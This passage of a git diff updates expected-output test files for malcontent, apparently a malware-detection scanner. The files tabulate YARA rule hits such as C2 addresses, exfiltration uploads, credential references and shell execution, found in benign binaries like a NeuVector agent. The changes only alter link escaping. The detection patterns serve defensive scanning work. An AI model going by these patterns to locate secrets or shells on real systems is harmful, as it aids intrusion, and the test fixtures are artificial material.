[https://tools.ietf.org/html/rfc2518](https%3A%2F%2Ftools.ietf.org%2Fhtml%2Frfc2518)
[https://tools.ietf.org/html/rfc5322](https%3A%2F%2Ftools.ietf.org%2Fhtml%2Frfc5322)
[https://tools.ietf.org/html/rfc6585](https%3A%2F%2Ftools.ietf.org%2Fhtml%2Frfc6585)
[https://tools.ietf.org/html/rfc7231](https%3A%2F%2Ftools.ietf.org%2Fhtml%2Frfc7231)
[https://tools.ietf.org/html/rfc7232](https%3A%2F%2Ftools.ietf.org%2Fhtml%2Frfc7232)
[https://tools.ietf.org/html/rfc7233](https%3A%2F%2Ftools.ietf.org%2Fhtml%2Frfc7233)
[https://tools.ietf.org/html/rfc7235](https%3A%2F%2Ftools.ietf.org%2Fhtml%2Frfc7235)
[https://tools.ietf.org/html/rfc7538](https%3A%2F%2Ftools.ietf.org%2Fhtml%2Frfc7538)
[https://tools.ietf.org/html/rfc7725](https%3A%2F%2Ftools.ietf.org%2Fhtml%2Frfc7725)
[https://github.com/warrenweckesser](https%3A%2F%2Fgithub.com%2Fwarrenweckesser)
[https://managedhsm.azure.net/https](https%3A%2F%2Fmanagedhsm.azure.net%2Fhttps)
[https://management.azure.com/https](https%3A%2F%2Fmanagement.azure.com%2Fhttps)
[https://servicebus.azure.net/https](https%3A%2F%2Fservicebus.azure.net%2Fhttps)
[https://www.w3.org/TR/css-color-4/](https%3A%2F%2Fwww.w3.org%2FTR%2Fcss-color-4%2F)
[https://dev.azuresynapse.nethttps](https%3A%2F%2Fdev.azuresynapse.nethttps)
[https://github.com/burnburnrocket](https%3A%2F%2Fgithub.com%2Fburnburnrocket)
[https://graph.microsoft.com/https](https%3A%2F%2Fgraph.microsoft.com%2Fhttps)
[https://min.io/compliance?ref=con](https%3A%2F%2Fmin.io%2Fcompliance%3Fref%3Dcon)
[https://redux.js.org/Errors?code=](https%3A%2F%2Fredux.js.org%2FErrors%3Fcode%3D)
[https://spec.commonmark.org/0.30/](https%3A%2F%2Fspec.commonmark.org%2F0.30%2F)
[https://www.unicode.org/versions/](https%3A%2F%2Fwww.unicode.org%2Fversions%2F)
[https://api.loganalytics.iohttps](https%3A%2F%2Fapi.loganalytics.iohttps)
[https://datalake.azure.net/https](https%3A%2F%2Fdatalake.azure.net%2Fhttps)
[https://github.com/wooorm/bcp-47](https%3A%2F%2Fgithub.com%2Fwooorm%2Fbcp-47)
[https://graph.microsoft.us/https](https%3A%2F%2Fgraph.microsoft.us%2Fhttps)
[https://min.io/download/?ref=con](https%3A%2F%2Fmin.io%2Fdownload%2F%3Fref%3Dcon)
[https://nodejs.org/api/http.html](https%3A%2F%2Fnodejs.org%2Fapi%2Fhttp.html)
[https://sts.amazonaws.comblake2b](https%3A%2F%2Fsts.amazonaws.comblake2b)
[https://d3js.org/d3-shape/stack](https%3A%2F%2Fd3js.org%2Fd3-shape%2Fstack)
[https://gallery.azure.com/https](https%3A%2F%2Fgallery.azure.com%2Fhttps)
[https://github.com/juanpgaviria](https%3A%2F%2Fgithub.com%2Fjuanpgaviria)
[https://github.com/kolodny/jsan](https%3A%2F%2Fgithub.com%2Fkolodny%2Fjsan)
[https://graph.cloudapi.de/https](https%3A%2F%2Fgraph.cloudapi.de%2Fhttps)
[https://html2canvas.hertzen.com](https%3A%2F%2Fhtml2canvas.hertzen.com)
[https://moment.github.io/luxon/](https%3A%2F%2Fmoment.github.io%2Fluxon%2F)
[https://s3.amazonaws.comignores](https%3A%2F%2Fs3.amazonaws.comignores)
[https://fetch.spec.whatwg.org/](https%3A%2F%2Ffetch.spec.whatwg.org%2F)
[https://github.com/MrRio/jsPDF](https%3A%2F%2Fgithub.com%2FMrRio%2FjsPDF)
[https://github.com/danielhusar](https%3A%2F%2Fgithub.com%2Fdanielhusar)
[https://github.com/gingerchris](https%3A%2F%2Fgithub.com%2Fgingerchris)
[https://infra.spec.whatwg.org/](https%3A%2F%2Finfra.spec.whatwg.org%2F)
[https://redux.js.org/api/store](https%3A%2F%2Fredux.js.org%2Fapi%2Fstore)
[https://subnet.min.io/?ref=con](https%3A%2F%2Fsubnet.min.io%2F%3Fref%3Dcon)
[https://www.w3.org/TR/cssom-1/](https%3A%2F%2Fwww.w3.org%2FTR%2Fcssom-1%2F)
[https://github.com/chris-rock](https%3A%2F%2Fgithub.com%2Fchris-rock)
[https://github.com/jamesbrobb](https%3A%2F%2Fgithub.com%2Fjamesbrobb)
[https://github.com/lsdriscoll](https%3A%2F%2Fgithub.com%2Flsdriscoll)
[https://min.io/signup?ref=con](https%3A%2F%2Fmin.io%2Fsignup%3Fref%3Dcon)
[https://min.io/videos?ref=con](https%3A%2F%2Fmin.io%2Fvideos%3Fref%3Dcon)
[https://www.w3.org/TR/WCAG20/](https%3A%2F%2Fwww.w3.org%2FTR%2FWCAG20%2F)
[https://blog.min.io/?ref=con](https%3A%2F%2Fblog.min.io%2F%3Fref%3Dcon)
[https://docs.min.io/?ref=con](https%3A%2F%2Fdocs.min.io%2F%3Fref%3Dcon)
[https://github.com/eaparango](https%3A%2F%2Fgithub.com%2Feaparango)
[https://github.com/pablohess](https%3A%2F%2Fgithub.com%2Fpablohess)
[https://github.com/siefkenj/](https%3A%2F%2Fgithub.com%2Fsiefkenj%2F)
[https://min.io/signup?ref=mc](https%3A%2F%2Fmin.io%2Fsignup%3Fref%3Dmc)
[https://github.com/Flamenco](https%3A%2F%2Fgithub.com%2FFlamenco)
[https://github.com/dollaruw](https%3A%2F%2Fgithub.com%2Fdollaruw)
[https://github.com/flamenco](https%3A%2F%2Fgithub.com%2Fflamenco)
[https://github.com/ineedfat](https%3A%2F%2Fgithub.com%2Fineedfat)
[https://github.com/stefslon](https%3A%2F%2Fgithub.com%2Fstefslon)
[https://mdn.io/Number/isNaN](https%3A%2F%2Fmdn.io%2FNumber%2FisNaN)
[https://github.com/BiggA94](https%3A%2F%2Fgithub.com%2FBiggA94)
[https://github.com/Gavvers](https%3A%2F%2Fgithub.com%2FGavvers)
[https://github.com/acspike](https%3A%2F%2Fgithub.com%2Facspike)
[https://github.com/diegocr](https%3A%2F%2Fgithub.com%2Fdiegocr)
[https://github.com/fjenett](https%3A%2F%2Fgithub.com%2Ffjenett)
[https://play.min.ioparsing](https%3A%2F%2Fplay.min.ioparsing)
[https://crbug.com/1264708](https%3A%2F%2Fcrbug.com%2F1264708)
[https://github.com/jmorel](https%3A%2F%2Fgithub.com%2Fjmorel)
[https://github.com/woolfg](https%3A%2F%2Fgithub.com%2Fwoolfg)
[https://mermaid.live/edit](https%3A%2F%2Fmermaid.live%2Fedit)
[https://minio.example.com](https%3A%2F%2Fminio.example.com)
[https://subnet.min.iohttp](https%3A%2F%2Fsubnet.min.iohttp)
[https://bugzil.la/875615](https%3A%2F%2Fbugzil.la%2F875615)
[https://dr.minio-storage](https%3A%2F%2Fdr.minio-storage)
[https://github.com/lifof](https%3A%2F%2Fgithub.com%2Flifof)
[https://iamcredentials..](https%3A%2F%2Fiamcredentials..)
[https://warm-minio-1.com](https%3A%2F%2Fwarm-minio-1.com)
[https://warm-minio-2.com](https%3A%2F%2Fwarm-minio-2.com)
[https://bit.ly/CRA-PWA.](https%3A%2F%2Fbit.ly%2FCRA-PWA.)
[https://min.io/?ref=con](https%3A%2F%2Fmin.io%2F%3Fref%3Dcon)
[https://notify.endpoint](https%3A%2F%2Fnotify.endpoint)
[https://polyfill.io/v3/](https%3A%2F%2Fpolyfill.io%2Fv3%2F)
[https://bit.ly/3cXEKWf](https%3A%2F%2Fbit.ly%2F3cXEKWf)
[https://min.io/signup.](https%3A%2F%2Fmin.io%2Fsignup.)
[https://s-c.sh/2BAXzed](https%3A%2F%2Fs-c.sh%2F2BAXzed)
[https://warm-minio.com](https%3A%2F%2Fwarm-minio.com)
[https://vecta.io/nano](https%3A%2F%2Fvecta.io%2Fnano)
[https://git.io/JUIaE](https%3A%2F%2Fgit.io%2FJUIaE)
[https://mdn.io/isNaN](https%3A%2F%2Fmdn.io%2FisNaN)
[https://www.fsf.org/](https%3A%2F%2Fwww.fsf.org%2F)
[https://example.com](https%3A%2F%2Fexample.com)
[https://hertzen.com](https%3A%2F%2Fhertzen.com)
[https://feross.org](https%3A%2F%2Ffeross.org)
[https://sts.reset](https%3A%2F%2Fsts.reset) | | LOW | [net/url/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/parse.yara#url_handle) | Handles URL strings | [RequestURI](https://github.com/search?q=RequestURI&type=code)
[new URL](https://github.com/search?q=new+URL&type=code) | | LOW | [os/env/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#getenv) | Retrieve environment variable values | [getenv](https://github.com/search?q=getenv&type=code) | | LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_wait](https://github.com/search?q=epoll_wait&type=code) | -| LOW | [os/fd/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/read.yara#py_fd_read) | reads from a file handle | [_readableStream.read()](https://github.com/search?q=_readableStream.read%28%29&type=code)
[_fullReader.read()](https://github.com/search?q=_fullReader.read%28%29&type=code)
[_reader.read()](https://github.com/search?q=_reader.read%28%29&type=code)
[this).read()](https://github.com/search?q=this%29.read%28%29&type=code)
[Ht(e.read()](https://github.com/search?q=Ht%28e.read%28%29&type=code)
[Lt(e.read()](https://github.com/search?q=Lt%28e.read%28%29&type=code)
[this.read()](https://github.com/search?q=this.read%28%29&type=code)
[d.read()](https://github.com/search?q=d.read%28%29&type=code)
[i.read()](https://github.com/search?q=i.read%28%29&type=code) | +| LOW | [os/fd/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/read.yara#py_fd_read) | reads from a file handle | [_readableStream.read\(\)](https://github.com/search?q=_readableStream.read%28%29&type=code)
[_fullReader.read\(\)](https://github.com/search?q=_fullReader.read%28%29&type=code)
[_reader.read\(\)](https://github.com/search?q=_reader.read%28%29&type=code)
[this\).read\(\)](https://github.com/search?q=this%29.read%28%29&type=code)
[Ht\(e.read\(\)](https://github.com/search?q=Ht%28e.read%28%29&type=code)
[Lt\(e.read\(\)](https://github.com/search?q=Lt%28e.read%28%29&type=code)
[this.read\(\)](https://github.com/search?q=this.read%28%29&type=code)
[d.read\(\)](https://github.com/search?q=d.read%28%29&type=code)
[i.read\(\)](https://github.com/search?q=i.read%28%29&type=code) | | LOW | [os/fd/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [syscall.Sendfile](https://github.com/search?q=syscall.Sendfile&type=code)
[sendfile](https://github.com/search?q=sendfile&type=code) | -| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [childFlow.write(stream)](https://github.com/search?q=childFlow.write%28stream%29&type=code)
[tokenizer.write(stream)](https://github.com/search?q=tokenizer.write%28stream%29&type=code)
[document.write(n)](https://github.com/search?q=document.write%28n%29&type=code)
[internal.write(B)](https://github.com/search?q=internal.write%28B%29&type=code)
[internal.write(n)](https://github.com/search?q=internal.write%28n%29&type=code)
[H.write(B)](https://github.com/search?q=H.write%28B%29&type=code)
[e.write(A)](https://github.com/search?q=e.write%28A%29&type=code)
[e.write(r)](https://github.com/search?q=e.write%28r%29&type=code)
[i.write(u)](https://github.com/search?q=i.write%28u%29&type=code)
[o.write(t)](https://github.com/search?q=o.write%28t%29&type=code)
[r.write(d)](https://github.com/search?q=r.write%28d%29&type=code)
[r.write(s)](https://github.com/search?q=r.write%28s%29&type=code)
[t.write(a)](https://github.com/search?q=t.write%28a%29&type=code) | +| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [childFlow.write\(stream\)](https://github.com/search?q=childFlow.write%28stream%29&type=code)
[tokenizer.write\(stream\)](https://github.com/search?q=tokenizer.write%28stream%29&type=code)
[document.write\(n\)](https://github.com/search?q=document.write%28n%29&type=code)
[internal.write\(B\)](https://github.com/search?q=internal.write%28B%29&type=code)
[internal.write\(n\)](https://github.com/search?q=internal.write%28n%29&type=code)
[H.write\(B\)](https://github.com/search?q=H.write%28B%29&type=code)
[e.write\(A\)](https://github.com/search?q=e.write%28A%29&type=code)
[e.write\(r\)](https://github.com/search?q=e.write%28r%29&type=code)
[i.write\(u\)](https://github.com/search?q=i.write%28u%29&type=code)
[o.write\(t\)](https://github.com/search?q=o.write%28t%29&type=code)
[r.write\(d\)](https://github.com/search?q=r.write%28d%29&type=code)
[r.write\(s\)](https://github.com/search?q=r.write%28s%29&type=code)
[t.write\(a\)](https://github.com/search?q=t.write%28a%29&type=code) | | LOW | [os/kernel/netlink](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/netlink.yara#netlink) | communicate with kernel services | [netlink](https://github.com/search?q=netlink&type=code) | | LOW | [os/time/tzinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/time/tzinfo.yara#tzinfo) | Uses timezone information | [tzdata](https://github.com/search?q=tzdata&type=code) | | LOW | [process/chroot](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chroot.yara#chroot) | change the location of root for the process | [chroot](https://github.com/search?q=chroot&type=code) | diff --git a/tests/linux/clean/neuvector_agent_aarch64.md b/tests/linux/clean/neuvector_agent_aarch64.md index 13660b607..f32004ca1 100644 --- a/tests/linux/clean/neuvector_agent_aarch64.md +++ b/tests/linux/clean/neuvector_agent_aarch64.md @@ -7,7 +7,7 @@ | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [preconditionsserverAddressincludeObjectfieldSelectorman](https://github.com/search?q=preconditionsserverAddressincludeObjectfieldSelectorman&type=code)
[extensionserverAddressByClientCIDRsdeletionGracePer](https://github.com/search?q=extensionserverAddressByClientCIDRsdeletionGracePer&type=code)
[server_address](https://github.com/search?q=server_address&type=code) | | MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [client_id](https://github.com/search?q=client_id&type=code)
[clientID](https://github.com/search?q=clientID&type=code) | | MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#cloudflare_dns_ip) | contains Cloudflare DNS resolver IP | [1.1.1.1](https://github.com/search?q=1.1.1.1&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[windows](https://github.com/search?q=windows&type=code)
[darwin](https://github.com/search?q=darwin&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https%3A%2F%2F)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http%3A%2F%2F)
[windows](https://github.com/search?q=windows&type=code)
[darwin](https://github.com/search?q=darwin&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [archive/zip](https://github.com/search?q=archive%2Fzip&type=code) | | MEDIUM | [collect/databases/mysql](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/mysql.yara#mysql) | accesses MySQL databases | [mysql](https://github.com/search?q=mysql&type=code) | | MEDIUM | [collect/databases/postgresql](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/postgresql.yara#postgresql) | accesses PostgreSQL databases | [postgresql](https://github.com/search?q=postgresql&type=code) | @@ -26,7 +26,7 @@ | MEDIUM | [evasion/file/location/var_run](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/var-run.yara#var_run_subfolder) | references subfolder within /var/run | [/var/run/dockershim.sock/](https://github.com/search?q=%2Fvar%2Frun%2Fdockershim.sock%2F&type=code)
[/var/run/docker.sock/](https://github.com/search?q=%2Fvar%2Frun%2Fdocker.sock%2F&type=code)
[/var/run/openvswitch/](https://github.com/search?q=%2Fvar%2Frun%2Fopenvswitch%2F&type=code)
[/var/run/secrets/](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2F&type=code)
[/var/run/crio/](https://github.com/search?q=%2Fvar%2Frun%2Fcrio%2F&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | hidden path in a system directory | [/usr/local/bin/.nvcontainerRunnin](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2F.nvcontainerRunnin&type=code)
[/meminfo/etc/timezone/dev/.udev](https://github.com/search?q=%2Fmeminfo%2Fetc%2Ftimezone%2Fdev%2F.udev&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [isAllowIpRuntimeCommand](https://github.com/search?q=isAllowIpRuntimeCommand&type=code)
[isAllowRuncInitCommand](https://github.com/search?q=isAllowRuncInitCommand&type=code)
[evaluateRuntimeCmd](https://github.com/search?q=evaluateRuntimeCmd&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#exec_cmd_run) | executes external programs | [).CombinedOutput](https://github.com/search?q=%29.CombinedOutput&type=code)
[exec.(*Cmd).Run](https://github.com/search?q=exec.%28%2ACmd%29.Run&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#exec_cmd_run) | executes external programs | [\).CombinedOutput](https://github.com/search?q=%29.CombinedOutput&type=code)
[exec.\(*Cmd\).Run](https://github.com/search?q=exec.%28%2ACmd%29.Run&type=code) | | MEDIUM | [exec/shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/exec.yara#calls_shell) | executes shell | [/bin/bash](https://github.com/search?q=%2Fbin%2Fbash&type=code)
[/bin/dash](https://github.com/search?q=%2Fbin%2Fdash&type=code)
[/bin/sh](https://github.com/search?q=%2Fbin%2Fsh&type=code) | | MEDIUM | [exec/system_controls/apparmor](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/system_controls/apparmor.yara#apparmor) | Mentions 'apparmor' | [apparmor](https://github.com/search?q=apparmor&type=code) | | MEDIUM | [exfil/upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/upload.yara#dropbox_disk_user) | uses DropBox for cloud storage | [Dropbox](https://github.com/search?q=Dropbox&type=code) | @@ -72,7 +72,7 @@ | MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [ontain alphanumerical characters onlyexplicitly tagged !!](https://github.com/search?q=ontain+alphanumerical+characters+onlyexplicitly+tagged+%21%21&type=code)
[not foundNo interface!!](https://github.com/search?q=not+foundNo+interface%21%21&type=code)
[number println!!](https://github.com/search?q=number+println%21%21&type=code) | | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [interceptor](https://github.com/search?q=interceptor&type=code) | | LOW | [anti-behavior/random_behavior](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random) | uses a random number generator | [Xsqlite3OsRandomness](https://github.com/search?q=Xsqlite3OsRandomness&type=code)
[NewRandomFromReader](https://github.com/search?q=NewRandomFromReader&type=code)
[Xsqlite3_randomness](https://github.com/search?q=Xsqlite3_randomness&type=code)
[nonZeroRandomBytes](https://github.com/search?q=nonZeroRandomBytes&type=code)
[newRandomFromPool](https://github.com/search?q=newRandomFromPool&type=code)
[rbuVfsRandomness](https://github.com/search?q=rbuVfsRandomness&type=code)
[memdbRandomness](https://github.com/search?q=memdbRandomness&type=code)
[rand_getrandom](https://github.com/search?q=rand_getrandom&type=code)
[readTimeRandom](https://github.com/search?q=readTimeRandom&type=code)
[unixRandomness](https://github.com/search?q=unixRandomness&type=code)
[WithRandomID](https://github.com/search?q=WithRandomID&type=code)
[urandomshort](https://github.com/search?q=urandomshort&type=code)
[randomOrder](https://github.com/search?q=randomOrder&type=code)
[randomPoint](https://github.com/search?q=randomPoint&type=code)
[nextRandom](https://github.com/search?q=nextRandom&type=code)
[randomBlob](https://github.com/search?q=randomBlob&type=code)
[randomEnum](https://github.com/search?q=randomEnum&type=code)
[randomFunc](https://github.com/search?q=randomFunc&type=code)
[randomblob](https://github.com/search?q=randomblob&type=code)
[readRandom](https://github.com/search?q=readRandom&type=code)
[GetRandom](https://github.com/search?q=GetRandom&type=code)
[getRandom](https://github.com/search?q=getRandom&type=code) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[amd64](https://github.com/search?q=amd64&type=code)
[arm64](https://github.com/search?q=arm64&type=code)
[x86](https://github.com/search?q=x86&type=code) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https%3A%2F%2F)
[http://](http%3A%2F%2F)
[amd64](https://github.com/search?q=amd64&type=code)
[arm64](https://github.com/search?q=arm64&type=code)
[x86](https://github.com/search?q=x86&type=code) | | LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [d for field Passwordruntime](https://github.com/search?q=d+for+field+Passwordruntime&type=code)
[socksUsernamePassword](https://github.com/search?q=socksUsernamePassword&type=code)
[PasswordEprotobuf](https://github.com/search?q=PasswordEprotobuf&type=code)
[no passwords used](https://github.com/search?q=no+passwords+used&type=code)
[vpasswordoffsets](https://github.com/search?q=vpasswordoffsets&type=code)
[stripPassword](https://github.com/search?q=stripPassword&type=code)
[UserPassword](https://github.com/search?q=UserPassword&type=code)
[GetPassword](https://github.com/search?q=GetPassword&type=code)
[passwordSet](https://github.com/search?q=passwordSet&type=code) | | LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [privateKey](https://github.com/search?q=privateKey&type=code) | | LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [crypto/aes](https://github.com/search?q=crypto%2Faes&type=code)
[AES](https://github.com/search?q=AES&type=code) | @@ -104,7 +104,7 @@ | LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [Rmdir](https://github.com/search?q=Rmdir&type=code)
[rmdir](https://github.com/search?q=rmdir&type=code) | | LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | | LOW | [fs/file/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#java_open) | opens files | [openFile](https://github.com/search?q=openFile&type=code) | -| LOW | [fs/file/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read) | reads files | [os.(*File).Read](https://github.com/search?q=os.%28%2AFile%29.Read&type=code)
[ReadFile](https://github.com/search?q=ReadFile&type=code) | +| LOW | [fs/file/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read) | reads files | [os.\(*File\).Read](https://github.com/search?q=os.%28%2AFile%29.Read&type=code)
[ReadFile](https://github.com/search?q=ReadFile&type=code) | | LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate](https://github.com/search?q=ftruncate&type=code) | | LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [writeRawFile](https://github.com/search?q=writeRawFile&type=code)
[WriteFile](https://github.com/search?q=WriteFile&type=code) | | LOW | [fs/link_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-create.yara#linkat) | May create hard file links | [linkat](https://github.com/search?q=linkat&type=code) | @@ -143,7 +143,7 @@ | LOW | [net/tcp/grpc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/grpc.yara#grpc) | Uses the gRPC Remote Procedure Call framework | [gRPC](https://github.com/search?q=gRPC&type=code) | | LOW | [net/udp/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp/udp-receive.yara#udp_listen) | Listens for UDP responses | [ReadFromUDP](https://github.com/search?q=ReadFromUDP&type=code)
[listenUDP](https://github.com/search?q=listenUDP&type=code) | | LOW | [net/udp/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp/udp-send.yara#udp_send) | Sends UDP packets | [WriteMsgUDP](https://github.com/search?q=WriteMsgUDP&type=code)
[DialUDP](https://github.com/search?q=DialUDP&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://git.k8s.io/community/contributors/devel/sig-architecture/api-conv](https://git.k8s.io/community/contributors/devel/sig-architecture/api-conv)
[https://kubernetes.default/apis/config.openshift.io/v1/clusteroperators/o](https://kubernetes.default/apis/config.openshift.io/v1/clusteroperators/o)
[https://www.iana.org/assignments/service-names-port-numbers/service-names](https://www.iana.org/assignments/service-names-port-numbers/service-names)
[https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md](https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md)
[https://kubernetes.io/docs/reference/using-api/api-concepts/](https://kubernetes.io/docs/reference/using-api/api-concepts/)
[https://kubernetes.default/version/openshiftproto](https://kubernetes.default/version/openshiftproto)
[https://registry-1.docker.io/bufio.Scanner](https://registry-1.docker.io/bufio.Scanner)
[https://kubernetes.default/versionproto](https://kubernetes.default/versionproto)
[https://registry.hub.docker.com/Failed](https://registry.hub.docker.com/Failed)
[https://protobuf.dev/reference/go/faq](https://protobuf.dev/reference/go/faq)
[https://finishedmemLimitplatform](https://finishedmemLimitplatform)
[https://golang.org/pkg/unicode/](https://golang.org/pkg/unicode/)
[https://index.docker.io/json](https://index.docker.io/json)
[https://bugs.centos.org/](https://bugs.centos.org/)
[https://www.centos.org/](https://www.centos.org/)
[https://docker.io/](https://docker.io/) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://git.k8s.io/community/contributors/devel/sig-architecture/api-conv](https%3A%2F%2Fgit.k8s.io%2Fcommunity%2Fcontributors%2Fdevel%2Fsig-architecture%2Fapi-conv)
[https://kubernetes.default/apis/config.openshift.io/v1/clusteroperators/o](https%3A%2F%2Fkubernetes.default%2Fapis%2Fconfig.openshift.io%2Fv1%2Fclusteroperators%2Fo)
[https://www.iana.org/assignments/service-names-port-numbers/service-names](https%3A%2F%2Fwww.iana.org%2Fassignments%2Fservice-names-port-numbers%2Fservice-names)
[https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md](https%3A%2F%2Fgithub.com%2FOAI%2FOpenAPI-Specification%2Fblob%2Fmaster%2Fversions%2F2.0.md)
[https://kubernetes.io/docs/reference/using-api/api-concepts/](https%3A%2F%2Fkubernetes.io%2Fdocs%2Freference%2Fusing-api%2Fapi-concepts%2F)
[https://kubernetes.default/version/openshiftproto](https%3A%2F%2Fkubernetes.default%2Fversion%2Fopenshiftproto)
[https://registry-1.docker.io/bufio.Scanner](https%3A%2F%2Fregistry-1.docker.io%2Fbufio.Scanner)
[https://kubernetes.default/versionproto](https%3A%2F%2Fkubernetes.default%2Fversionproto)
[https://registry.hub.docker.com/Failed](https%3A%2F%2Fregistry.hub.docker.com%2FFailed)
[https://protobuf.dev/reference/go/faq](https%3A%2F%2Fprotobuf.dev%2Freference%2Fgo%2Ffaq)
[https://finishedmemLimitplatform](https%3A%2F%2FfinishedmemLimitplatform)
[https://golang.org/pkg/unicode/](https%3A%2F%2Fgolang.org%2Fpkg%2Funicode%2F)
[https://index.docker.io/json](https%3A%2F%2Findex.docker.io%2Fjson)
[https://bugs.centos.org/](https%3A%2F%2Fbugs.centos.org%2F)
[https://www.centos.org/](https%3A%2F%2Fwww.centos.org%2F)
[https://docker.io/](https%3A%2F%2Fdocker.io%2F) | | LOW | [net/url/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/parse.yara#url_handle) | Handles URL strings | [RequestURI](https://github.com/search?q=RequestURI&type=code) | | LOW | [os/env/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#getenv) | Retrieve environment variables | [getenv](https://github.com/search?q=getenv&type=code) | | LOW | [os/fd/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [syscall.Sendfile](https://github.com/search?q=syscall.Sendfile&type=code)
